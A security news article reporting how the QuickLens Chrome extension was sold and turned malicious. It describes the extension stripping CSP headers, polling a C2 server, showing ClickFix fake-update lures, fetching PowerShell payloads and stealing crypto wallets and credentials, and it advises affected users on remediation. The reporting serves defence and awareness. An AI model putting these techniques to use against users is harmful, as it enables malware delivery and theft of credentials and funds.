A Chrome extension named “QuickLens – Search Screen with Google Lens” has been removed from the Chrome Web Store after it was compromised to push malware and attempt to steal crypto from thousands of users.
QuickLens was initially published as a Chrome extension that lets users run Google Lens searches directly in their browser. The extension grew to roughly 7,000 users and, at one point, received a featured badge from Google.
However, on February 17, 2026, a new version 5.8 was released that contained malicious scripts that introduced ClickFix attacks and info-stealing functionality for those using the extension.
The malicious QuickLens extension
Security researchers at Annex first reported that the extension had recently changed ownership after being listed for sale on ExtensionHub, a marketplace where developers sell browser extensions.
Annex says that on February 1, 2026, the owner changed to support@doodlebuggle.top under “LLC Quick Lens,” with a new privacy policy hosted on a barely functional domain. Just over two weeks later, the malicious update was pushed to users.
Annex’s analysis shows that version 5.8 requested new browser permissions, including declarativeNetRequestWithHostAccess and webRequest.
It also included a rules.json file that stripped browser security headers, such as Content-Security-Policy (CSP), X-Frame-Options, and X-XSS-Protection, from all pages and frames. These headers would have made it more difficult to run malicious scripts on websites.
The update also introduced communication with a command-and-control (C2) server at api.extensionanalyticspro[.]top. According to Annex, the extension generated a persistent UUID, fingerprinted the victim’s country using Cloudflare’s trace endpoint, identified the browser and OS, and then polled the C2 server every five minutes for instructions.
BleepingComputer learned about the extension this week after seeing numerous users [1, 2] reporting fake Google Update alerts on every web page they visited.
“That is appearing in every site i go, i through it could be because Chrome wasn’t updated, but even after uptading it continues to appear,” a user seeking help said on Reddit.
“Of course i will not run the code that it copy on my clipboard on the run box but it keeps appearing in every site, making it impossible to interact with anything.”
BleepingComputer’s analysis of the extension showed it connected to a C2 server at https://api.extensionanalyticspro[.]top/extensions/callback?uuid=[uuid]&extension=kdenlnncndfnhkognokgfpabgkgehoddto, where it received an array of malicious JavaScript scripts.
These payloads were then executed on every page load using a technique that Annex described as a “1×1 GIF pixel onload trick.”
Source: BleepingComputer
Because the extension stripped CSP headers on all visited sites, this inline JavaScript execution worked even on sites that would normally block it.
The first payload contacts google-update[.]icu, where it receives an additional payload that displays a fake Google Update prompt. Clicking the update button would display a ClickFix attack, prompting users to perform a verification by running code on their computers.
Source: Reddit [1, 2]
For Windows users, this led to the download of a malicious executable named “googleupdate.exe” [VirusTotal] that was signed with a certificate from “Hubei Da’e Zhidao Food Technology Co., Ltd.”
Upon execution, the malware launched a hidden PowerShell command that spawned a second PowerShell instance to connect to drivers[.]solutions/META-INF/xuoa.sys using a custom “Katzilla” user agent.
The response was piped into Invoke-Expression for execution. However, by the time BleepingComputer analyzed the payloads, the second-stage URL was no longer serving any malicious content.
Another malicious JavaScript “agent” delivered by the https://api.extensionanalyticspro[.]top C2 was used to steal cryptocurrency wallets and credentials.
The extension would detect if MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, and the Argon crypto wallets were installed. If so, it would attempt to steal activity and seed phrases, which would be used to hijack wallets and steal their assets.
Another script captured login credentials, payment information, and other sensitive form data.
Additional payloads were used to scrape Gmail inbox contents, extract Facebook Business Manager advertising account data, and collect YouTube channel information.
A review of the now-removed Chrome extension page claims that macOS users were targeted with the AMOS (Atomic Stealer) infostealer. BleepingComputer has not been able to independently verify if these claims are true.
Google has since removed QuickLens from the Chrome Web Store, and Chrome now automatically disables it for affected users.
Source: BleepingComputer
Users who installed QuickLens – Search Screen with Google Lens should ensure the extension is fully removed, scan their device for malware, and reset passwords for any credentials stored in the browser.
If you use any of the mentioned cryptocurrency wallets, you should transfer your funds to a new wallet.
This extension is not the first to be used in ClickFix attacks. Last month, Huntress discovered a browser extension that intentionally crashed browsers and then displayed fake fixes that installed the ModeloRAT malware.
Modern IT infrastructure moves faster than manual workflows can handle.
In this new Tines guide, learn how your team can reduce hidden manual delays, improve reliability through automated response, and build and scale intelligent workflows on top of tools you already use.